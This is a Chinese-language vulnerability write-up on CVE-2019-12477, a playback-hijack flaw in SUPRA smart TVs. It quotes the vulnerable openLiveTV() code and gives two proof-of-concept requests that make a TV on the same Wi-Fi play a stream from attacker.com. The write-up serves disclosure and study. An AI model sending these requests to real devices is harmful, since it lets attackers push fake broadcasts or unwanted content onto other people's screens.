[TOC]

SUPRA智能云播放劫持

描述:SUPRA智能云电视存在播放可劫持漏洞(CVE-2019-12477),与SUPRA电视处于同一无线网络环境中的攻击者,可向电视设备伪造播放请求,插播任意视频内容或虚假广播消息。

Dhiraj Mishra发现的漏洞问题在于电视流媒体获取功能 ‘openLiveURL()’,SUPRA电视用它来获取流媒体的播放内容,该功能缺乏必要的认证授权和会话管理措施,攻击者可以通过向一个静态的URL发送构造请求来触发漏洞,绕过授权验证,向播放机制中注入远程视频流文件,播放任意视频内容。

漏洞详情
漏洞接口位于 /remote/media_control?action=setUri&uri=URI服务端,存在漏洞的功能函数为openLiveTV(url),以下为openLiveTV(url)函数源码片段:

function openLiveTV(url)  {  
$.get("/remote/media_control", {
m_action:'setUri',
m_uri:url,m_type:'video/*'
}, function (data, textStatus){
if("success"==textStatus){
alert(textStatus);
}else {
alert(textStatus); }
});
}

向电视设备插入任意视频播放的构造请求POC:

GET /remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8 
HTTP/1.1Host: 192.168.1.155
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

直接用以下方式向处于同一无线网络环境中的SUPRA智能电视发起请求,也能实现插播效果POC:

http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8

备注: